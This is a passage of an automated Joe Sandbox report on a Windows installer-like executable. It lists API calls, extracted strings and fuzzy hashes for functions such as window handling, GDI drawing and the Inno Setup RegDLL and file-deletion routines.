                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID:
                                                                                            • API String ID: 568898626-0
                                                                                            • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                            • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                            • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                            • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureIconic
                                                                                            • String ID:
                                                                                            • API String ID: 2277910766-0
                                                                                            • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                            • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                                            • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                            • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241AB
                                                                                              • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                              • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                              • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                              • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                            • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2671590913-0
                                                                                            • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                            • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                            • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                            • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                            • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                                            • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                            • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                            • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                                            • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                            • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                            • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                                            • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                            • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                            • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                                            • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                            • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3292268677.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3292239708.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3292297238.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3292268677.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3292239708.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3292297238.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                                            • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                                            • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                                            • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                                            • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                            • API String ID: 4012871263-351310198
                                                                                            • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                            • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                                            • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                            • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                            • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                            • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                            • API String ID: 2323315520-3614243559
                                                                                            • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                            • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                                            • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                            • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                            • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                            • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                            • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                            • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                            • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                            • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                            • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                            • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                            • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                            • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                            • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                            • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                            • String ID:
                                                                                            • API String ID: 2377543522-0
                                                                                            • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                            • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                            • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                            • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                              • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                            • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                            • API String ID: 2000705611-3392794427
                                                                                            • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                            • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                                            • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                            • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                            • API String ID: 1452528299-3112430753
                                                                                            • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                            • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                                            • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
